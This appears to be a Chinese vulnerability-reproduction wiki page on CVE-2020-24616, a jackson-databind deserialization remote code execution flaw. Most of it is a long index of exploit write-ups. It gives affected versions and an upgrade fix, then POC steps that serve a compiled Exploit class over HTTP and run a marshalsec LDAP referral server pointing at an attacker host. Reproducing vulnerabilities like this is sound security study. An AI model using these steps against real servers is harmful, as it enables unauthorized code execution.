Jackson反序列化远程代码执行-CVE-2020-24616 - Jackson

常见组件漏洞的目录

ActiveMQ

ActiveMQ物理路径泄漏漏洞 CVE-2015-1830-ActiveMQ-路径遍历导致未经身份验证的rce CVE-2015-5254-ActiveMQ-反序列化漏洞 CVE-2016-3088-ActiveMQ应用漏洞 CVE-2017-15709-ActiveMQ-信息泄漏漏洞

Adobe-ColdFusion

CVE-2010-2861-Adobe-ColdFusion-文件读取漏洞 CVE-2017-3066-Adobe-ColdFusion-反序列化漏洞

Aerospike

CVE-2020-13151-Aerospike-数据库主机命令执行漏洞

Apache

Apache后门维持 CVE-2007-6750-Apache-ddos CVE-2017-15715-Apache解析漏洞 CVE-2019-0211-Apache-HTTP-服务组件提权漏洞

Apache-Airflow

CVE-2019-0216-Apache-Airflow-储存型xss CVE-2020-11978-Apache-Airflow-命令注入漏洞

Apache-Axis

CVE-2019-0227-Apache-Axis-1.4远程代码执行

Apache-Dubbo

CVE-2019-17564-Apache-Dubbo-反序列化漏洞 CVE-2020-1948-Apache-Dubbo-Hessian-反序列化漏洞

Apache-Flink

Apache-Flink-Dashboard-未授权访问-远程代码命令执行 Apache Flink 任意文件写入漏洞(CVE-2020-17518)Apache Flink 任意文件写入漏洞(CVE-2020-17519)

Apache-FusionAuth

CVE-2020-7799--Apache-FreeMarker模板FusionAuth远程代码执行漏洞

Apache-HTTPD

Apache-HTTPD-多后缀解析漏洞 CVE-2017-15715-Apache-HTTPD-换行解析漏洞

Apache-JMeter

CVE-2018-1297-Apache-Jmeter-RMI-反序列化命令执行漏洞

Apache-Kylin

CVE-2020-1956-Apache-Kylin-远程命令执行漏洞

Apache-Log4j

CVE-2017-5645-Log4j-2.X反序列化漏洞 CVE-2019-17571-Log4j-1.2.X反序列化漏洞

Apache-POI

CVE-2019-12415-Apache-POI-_=-4.1.0-XXE漏洞

Apache-SSI

Apache-SSI-远程命令执行漏洞

Apache-ShardingSphere

CVE-2020-1947-Apache-ShardingSphere远程代码执行漏洞

Apache-Shiro

CVE-2020-11989-Apache-Shiro1.5.3-身份认证绕过漏洞 CVE-2020-1957-Apache-Shiro1.5.2-身份认证绕过漏洞 CVE-2020-13933-Apache-Shiro1.6.0-身份认证绕过漏洞 CVE-2016-4437-Apache-Shiro1.2.4-反序列化漏洞

Apache-Solr

Apache-Solr-Velocity模版注入远程命令执行 CVE-2017-12629-Apache-Solr-rcexxe-漏洞 CVE-2019-0192-Apache-Solr-Deserialization-远程代码执行漏洞 CVE-2019-0193-Apache-Solr-远程命令执行漏洞 CVE-2019-12409-Apache-Solr-远程命令执行漏洞 CVE-2019-17558-Apache-Solr-代码注入漏洞

Apache-Spark

Apache-Spark-未授权访问漏洞

Apereo-CAS

Apereo-CAS-4.X-execution参数反序列化漏洞

Aria2

CVE-2016-3088-Aria2-任意文件写入漏洞

Atlassian-Jira

CVE-2019-11581-Atlassian-Jira-远程命令执行漏洞 CVE-2019-8449-Atlassian-Jira-信息泄露漏洞 CVE-2019-8451-Atlassian-Jira-未授权SSRF漏洞验证

Cacti

CVE-2020-8813-Cacti-v1.2.8-远程命令执行漏洞

Citrix

CVE-2019-19781-Citrix-远程命令执行漏洞 CVE-2020-7473-Citrix-认证绕过getshell CVE-2020-8194-Citrix-未授权访问导致的任意代码执行漏洞 CVE-2020-8195-Citrix-未授权访问漏洞 CVE-2020-8196-Citrix-Nitro-API-未授权访问漏洞 CVE-2020-8198-Citrix-储存型xss CVE-2020-ianianian-Citrix-目录遍历漏洞

Cobub-razor

Cobub-Razor-0.7.2存在跨站请求伪造漏洞 Cobub-Razor-0.7.2越权增加管理员账户 Cobub-Razor-0.8.0存在SQL注入漏洞 Cobub-Razor-0.8.0存在物理路径泄露漏洞 Couch-through-2.0存在路径泄露漏洞

Confluence

CVE-2019-3394-Confluence-文件读取漏洞 CVE-2019-3396-Confluence-路径穿越与命令执行漏洞 CVE-2019-3398-Confluence-路径穿越漏洞

Coremail

Coremail配置文件信息泄漏 coremail存储型xss

Django

CVE-2017-12794-Django-debug-page-XSS漏洞 CVE-2018-14574-Django-_-2.0.8-任意URL跳转漏洞 CVE-2019-14234-Django-JSONField-sql注入漏洞 CVE-2020-7471-Django-sql注入漏洞 CVE-2020-9402-Django-Geo-sql注入

Docker

CVE-2019-14271-Docker-copy漏洞 Docker-未授权访问

Elasticsearch

CVE-2014-3120-ElasticSearch-命令执行漏洞 CVE-2015-1427-ElasticSearch-Groovy-沙盒绕过--代码执行漏洞 CVE-2015-3337-ElasticSearch-目录穿越漏洞 CVE-2015-5531-ElasticSearch-目录穿越漏洞 Elasticsearch-1.5.x-后台getshell Elasticsearch未授权访问

Electron

CVE-2018-1000006-Electron-远程命令执行漏洞 CVE-2018-15685-Electron-WebPreferences-远程命令执行漏洞

F5-BIG-IP

CVE-2020-5902-F5-BIG-IP-远程命令执行漏洞 CVE-2021-22986

FasterXML-jackson

CVE-2019-12384--CVE-2019-12814-FasterXML-jackson-databind-反序列化漏洞 CVE-2019-14540-FasterXML-jackson-databind-远程命令执行漏洞 CVE-2020-14060-FasterXML-jackson-databind-反序列化漏洞 CVE-2020-14062-FasterXML-jackson-databind-反序列化漏洞 CVE-2020-14195-FasterXML-jackson-databind-反序列化漏洞 CVE-2020-24616-FasterXML-jackson-databind-远程命令执行漏洞 CVE-2020-8840-FasterXML-jackson-databind-远程代码执行漏洞

Fastjson

Fastjson-1.2.22---1.2.24-反序列化漏洞 Fastjson-1.2.68-最新版本有限制-autotype-bypass Fastjson-_=1.2.47-远程代码执行漏洞 Fastjson-_=1.2.60-DoS漏洞无损检测Fastjson与Jackson组建区分通过Dnslog判断是否使用fastjson

Hadoop

Hadoop未授权访问

Harbor

CVE-2019-16097-Harbor未授权创建管理员漏洞

IIS

CVE-2017-7269-IIS-6.0开启Webdav-缓存区溢出漏洞

ImageMagick

CVE-2016-3714-ImageMagick-命令执行漏洞

Jackson

Jackson反序列化远程代码执行-CVE-2020-24616 jackson-databind-rce-cve-2020-9548

Jboss

JexBoss---JBoss-(and-others-Java-Deserialization-Vulnerabilities)-verify-and-EXploitation-Tool

Jboss/反序列化漏洞

CVE-2013-4810-JBoss-EJBInvokerServle-反序列化漏洞 CVE-2015-7501-JBoss-JMXInvokerServlet-反序列化漏洞 CVE-2017-12149-JBosS-AS-6.X-反序列化漏洞 CVE-2017-7504-JBoss-4.x-JBossMQ-JMS-反序列化漏洞

Jboss/访问控制不严导致的漏洞

CVE-2007-1036-JBoss-JMX-Console-HtmlAdaptor-Getshell CVE-2010-0738-JBoss-JMX控制台安全验证绕过漏洞 JBoss-Administration-Console-弱口令-Getshell JBoss-JMX-Console未授权访问Getshell

Jenkins

CVE-2017-1000353-Jenkins-CI-远程代码执行漏洞 CVE-2018-1000861-Jenkins-远程命令执行漏洞 CVE-2019-1003000-Jenkins-远程代码执行漏洞 CVE-2019-10475-反射xss Jenkins-功能未授权访问导致的远程命令执行漏洞

Jinja2

Jinja2-SSTI-服务端模版注入攻击

Jira

cve-2019-8451-jira未授权ssrf漏洞验证

Joomla

CVE-2015-8562-Joomla-3.4.5-反序列化漏洞 CVE-2016-8869-Joomla-3.4.4-3.6.3-未授权创建特权用户 CVE-2017-14596-Joomla!-1.5-_=-3.7.5-LDAP注入绕过登录认证 CVE-2017-8917-Joomla-3.7.0-QL注入漏洞 CVE-2020-10238-Joomla-_=-3.9.15-远程命令执行漏洞 CVE-2020-11890-Joomla-远程命令执行漏洞 Joomla!-com_fabrik-3.9.11-目录遍历漏洞 Joomla!-com_hdwplayer-4.2---'search.php'-sql注入 Joomla!-component-GMapFP-3.30-任意文件上传 Joomla-3-3.4.6-远程命令执行漏洞 Joomla-3.4.6---'configuration.php'-Remote-Code-Execution Joomscan

Kibana

CVE-2018-17246-Kibana-Local-File-Inclusion CVE-2019-7609-Kibana-_-6.6.0-未授权远程代码命令执行

Laravel

CVE-2018-15133-Laravel-反序列化远程命令执行漏洞 CVE-2019-9081-Laravel-5.7-反序列化rce LARAVEL<=V8.4.2调试模式下的RCE

Mysql

MySQL-LOAD-DATA-读取客户端任意文

Nginx

CVE-2013-4547-Nginx-URI-Processing-安全绕过漏洞 CVE-2016-1247-Nginx-提权漏洞 CVE-2017-7529-Nginx-越界读取缓存漏洞 CVE-2019-20372-Nginx-error_page-请求走私漏洞 CVE-2020-12440-Nginx-_=-1.8.0-请求走私 Nginx-解析漏洞 Nginx-配置错误漏洞-CRLF注入漏洞 Nginx-配置错误漏洞-add_header被覆盖 Nginx-配置错误漏洞-目录穿越漏洞

Node.js

CVE-2017-14849-Node.js-目录穿越漏洞

Php

CVE-2012-1823-PHP-CGI远程代码执行漏洞 CVE-2018-19518-PHP-imap-远程命令执行漏洞 CVE-2019-11043-PHP-远程命令执行 PHP序列化和反序列化语法差异问题 Php-XDebug-远程调试漏洞 Php文件包含漏洞利用phpinfo-php-mt_rand函数的安全问题探讨

Php/Php-screw加密与破解

一-Php-screw加密与破解工具php-screw-brute-三-通过IDA获取加密的key 二-Php-screw加密与破解工具screw_decode-四-php-screw加密文件

Redis

(python)Mongodb-Redis匿名扫描脚本 (python)redis未授权批量提权脚本 redis总结 redis未授权访问漏洞

Ruby-On-Rails

CVE-2018-3760-Ruby-On-Rails-任意文件读取漏洞 CVE-2019-5418-Ruby-on-Rails-路径穿越与任意文件读取漏洞

SQL-Server

CVE-2020-0618-SQL-Server-远程代码执行漏洞-

SaltStack

CVE-2020-11651-SaltStack远程命令执行漏洞 SaltStack未授权访问及命令执行漏洞-CVE-2020-16846-CVE-2020-25592

SharePoint

CVE-2020-1181-SharePoint远程代码执行漏洞

Smarty

CVE-2017-1000480-Smarty_=3.1.31-命令执行RCE

Sprig-Cloud

Spring-Cloud-Netflix-Hystrix-Dashboard-SSRF漏洞

Spring

CVE-2020-5398-Spring-MVC的RFD（反射文件下载）cve-2018-1273_cmd

Spring-Boot

Spring-Boot-Actuator-hikari配置不当导致的远程命令执行漏洞 Spring-Boot-Actuator-jolokia-配置不当导致的XXE漏洞 Spring-Boot-Actuator-jolokia-配置不当导致的rce漏洞 Spring-Boot-Thymeleaf-模板注入 Spring-Boot-Tomcat导致的JNDI注入 Spring-Boot-eureka-xstream-deserialization-rce Spring-Boot-h2-database-query-rce Spring-Boot-mysql-jdbc-deserialization-rce Spring-Boot-sql Spring-Boot-whitelabel-error-page-SpEL-rce Spring-Boot-修改环境属性导致的rce Spring-Boot-提取内存密码 Spring-Boot-获取被星号脱敏的密码的明文 Spring-Boot-路由地址及接口调用详情泄漏 Spring-Boot-配置不当而暴露的路由

Spring-Cloud

CVE-2019-3799-Spring-Cloud-Config-Server-任意文件读取 CVE-2019-3799-Spring-Cloud-Config-Server-任意文件读取-CVE-2020-5405-Spring-Cloud-Config-Server-目录穿越-CVE-2020-5410-Spring-Cloud-Config-目录穿越漏洞 Spring-Cloud-SnakeYAML-RCE

Spring-Data

CVE-2017-8046-Spring-Data-Rest-远程命令执行漏洞 CVE-2018-1273-Spring-Data-Commons组件远程代码执行漏洞

Spring-Messaging

CVE-2018-1270-Spring-Messaging-远程命令执行漏洞

Spring-Security-Oauth

CVE-2016-4977-Spring-Security-OAuth2-远程命令执行漏洞 CVE-2018-1260-Spring-Security-Oauth2-远程代码执行 CVE-2019-3778-Spring-Security-OAuth2-开放重定向

Spring-Statemachine

yii2-statemachine-v2.x.x存在XSS漏洞

Spring-WebFlow

CVE-2017-4971-Spring-WebFlow-远程代码执行漏洞

Struts2

Struts2-059 Struts2-061 Struts2-S2-032远程代码执行 Struts2-S2-045远程代码执行 Struts2-S2-057-远程代码执行漏洞(CVE-2018-11776)readme

Struts2/S2-048(CVE-2017-9791)

Struts2/Struts2-Scan

Struts2/Struts2_045-Poc

Struts2/Struts2_045-Poc/Search_S2_045

Thinkphp

Thinkphp-2.X-RCE漏洞 Thinkphp-2.X-RCE漏洞环境搭建 Thinkphp-3.2.3-缓存漏洞 Thinkphp-5.0.(0-21)&5.1.(3-25)sql注入漏洞 Thinkphp-5.0.(13-15)&5.1.(0-5)-sql注入漏洞 Thinkphp-5.0.(7-22)&5.1.(0-30)远程代码执行漏洞 Thinkphp-5.0.10-sql注入漏洞 Thinkphp-5.1.(16-22)-sql注入漏洞 Thinkphp-5.1.(6-8)-sql注入漏洞 Thinkphp-5.x远程代码执行漏洞环境 Thinkphp-5.x远程命令执行漏洞 Thinkphp-全版本sql注入漏洞 Thinkphp5文件包含漏洞 thinkphp thinkphp5命令执行 thinkphp5框架缺陷导致远程代码执行

Thinkphp/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷

Thinkphp/ThinkPHP_5.X_远程代码执行漏洞

Tomcat

CVE-2016-1240-Tomcat本地提权漏洞 CVE-2016-8735-Tomcat-反序列化漏洞 CVE-2017-12615-Tomcat-PUT方法任意文件写入漏洞 CVE-2017-12616-Tomcat-信息泄露 CVE-2017-12617-Tomcat-RCE-via-JSP-Upload-Bypass CVE-2018-1305-Tomcat-安全绕过漏洞 CVE-2019-0221-Apache-Tomcat-SSI-printenv指令中的XSS CVE-2019-0232-Tomcat-rce CVE-2020-1938-Apache-Tomcat-文件包含漏洞 CVE-2020-9484-Tomcat-session反序列化漏洞 Tomcat-后台爆破 Tomcat-后台部署war木马getshell Tomcat样例目录session操纵漏洞基于Tomcat的内存Webshell-无文件攻击技术通过jmx攻击Tomcat

Tomcat/Tomcat-URL-解析差异性导致的安全问题

Tomcat/Tomcat-URL-解析差异性导致的安全问题/URL差异性

Tomcat-HttpServletRequest中几个解析URL的函数 Tomcat-特殊字符的URL解析

Tomcat/Tomcat-URL-解析差异性导致的安全问题/调试分析

Tomcat-URL-解析差异性攻击利用 Tomcat-getContextPath()的处理 Tomcat-getPathInfo()的处理 Tomcat-getRequestURI()的处理 Tomcat-getRequestURL()的处理 Tomcat-getServletPath()的处理 Tomcat对URL特殊字符的处理

VMware

VMware-vCenter未授权任意文件读取 VMware-vCenter-Server-远程代码执行漏洞-CVE-2021-21972

Weblogic

CVE-2017-10271-Weblogic-XMLDecoder-反序列化漏洞 CVE-2017-3248-Weblogic-反序列化漏洞 CVE-2017-3506-Weblogic反序列化漏洞 CVE-2018-2628-Weblogic反序列化漏洞 CVE-2018-2893-Weblogic-WLS核心组件反序列化漏洞 CVE-2018-2894-Weblogic任意文件上传 CVE-2018-3191-Weblogic远程代码执行漏洞 CVE-2018-3245-Weblogic反序列化远程代码执行漏洞 CVE-2019-2615-Weblogic-任意文件读取漏洞 CVE-2019-2618-Weblogic任意文件上传漏洞 CVE-2019-2725-CNVD-C-2019-48814-Weblogic反序列化远程代码执行漏洞 CVE-2019-2729-Weblogic反序列化漏洞 CVE-2019-2888-Weblogic-EJBTaglibDescriptor-XXE漏洞 CVE-2019-2890-Weblogic反序列化漏洞 CVE-2020-2551-Weblogic-CVE-2020-2551-IIOP协议反序列化rce CVE-2020-2555-Oracle-CoherenceWeblogic-反序列化远程代码执行漏洞 CVE-2020-2883-Weblogic-远程代码执行漏洞 weblogic爆破 WebLogic远程代码执行漏洞-CVE-2021-2109

Webmin

CVE-2019-15107-Webmin-远程命令执行漏洞

XAMPP

CVE-2020-11107-XAMPP任意命令执行漏洞

XStream

CVE-2019-10173-Xstream-1.4.10版本远程代码执行漏洞

Yii

CVE-2020-15148-Yii框架反序列化远程命令执行

Zabbix

CVE-2016-10134-Zabbix-latest.php-sql注入漏洞 CVE-2020-11800-Zabbix-RCE

Zimbra

CVE-2019-9621-CVE-2019-9670-Zimbra-远程代码执行漏洞

mini_httpd

mini_httpd任意文件读取漏洞（CVE-2018-18778）

nexus

Nexus-Repository-Manager-3-远程代码执行漏洞CVE-2019-7238 nexus-oss-命令执行漏洞-(cve-2020-10199-&&-10204)

phpstudy

phpStudy-nginx-解析漏洞 phpmyadmin_defaultpwd phpstudy_backdoor phpstudy后门 phpstudy敏感信息泄露

showdoc

showdoc的api_page存在任意文件上传getshell

vBulletin

vBulletin-5.x-RCE（CVE-2019-16759-）vBulletin5-5.6.1-SQL注入漏洞

websphere

IBM-WebSphere存在XXE外部实体注⼊漏洞-CVE-2020-4643

宝塔

宝塔-Phpmyadmin-未授权访问漏洞

深信服

深信服-终端检测相应平台EDR--任意命令执行漏洞深信服-终端检测相应平台EDR--任意用户登陆漏洞

齐治堡垒机

CNVD-2019-09593-齐治堡垒机-ShtermClient-2.1.1-命令执行漏洞 CNVD-2019-17294-齐治堡垒机-后台命令执行漏洞 CNVD-2019-20835-齐治堡垒机-前台远程命令执行漏洞

SolarWinds

larWinds-Orion-API-远程代码执行漏洞CVE-2020-10148

FreeMarker

FreeMarker-Template-Inject

jumpserver

JumpServer日志读取-命令执行

fastjsoon

fastjson漏洞利用

Lanproxy

Lanproxy路径遍历(CVE-2021-3019)

Microsoft

CVE-2020-1472-ZeroLogon漏洞分析利用

Microsoft/Microsoft-Exchange

CVE-2020-17083-Microsoft-Exchange-Server任意代码执行漏洞-POC CVE-2020-0688-Microsoft-Exchange-远程命令执行漏洞 CVE-2020-0688-Microsoft-Exchange-Server远程代码执行漏洞 Microsoft Exchange 远程命令执行 CVE-2021-26855-26857-26858-27065

Microsoft/Microsoft-SharePoint

CVE-2019-0604-Microsoft-SharePoint-远程代码执行漏洞

Microsoft/Microsoft-Windows-Print-Spooler

CVE-2020-1337 CVE-2020-1048-Microsoft-Windows-Print-Spooler提权漏洞

Microsoft/Windows-DNS-Server

CVE-2020-1350-Windows-DNS-Server蠕虫级远程代码执行漏洞

Couchdb

CVE-2017-12635 CVE-2017-12636

Winmail

WinMail漏洞合集

Microsoft-IE

2018年ie漏洞复现集合

漏洞描述

FasterXML Jackson发布了新的高危漏洞（漏洞编号：CVE-2020-24616），其官方团队发布了 jackson-databind 的新版本 2.9.10.6，其中修复了几个反序列化漏洞。 FasterXML Jackson是美国FasterXML公司的一款适用于Java的数据处理工具。jackson-databind是其中的一个具有数据绑定功能的组件。 FasterXML jackson-databind 2.9.10.6之前的版本中存在安全漏洞，该漏洞源于不安全的反序列化。远程攻击者可通过精心构造的恶意载荷利用该漏洞在系统执行任意代码。

影响版本

jackson-databind < 2.9.10.6

安全版本

jackson-databind 2.9.10.6 jackson-databind 2.10

漏洞修复

1.建议用户将jackson-databind组件升级到安全版本。 https://github.com/FasterXML/jackson-databind/releases 2.在Jackson 2.10 中引入了Safe Default Typing白名单机制，可杜绝此类gadget的影响。

POC

把编译好的exploit.class放置在服务端开启HTTP服务 python3 -m http.server 8888 或者tomcat都行启动LDAP``` java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://x.x.x.x(服务端Ip):8888/#Exploit” 9999

PS:poc中的端口号要和LDAP的对应本地运行javaPOC ![](./Jackson反序列化远程代码执行 CVE-2020-24616/ttt-1.png) [cve-2020-24616-poc-master](./Jackson反序列化远程代码执行 CVE-2020-24616/cve-2020-24616-poc-master.zip)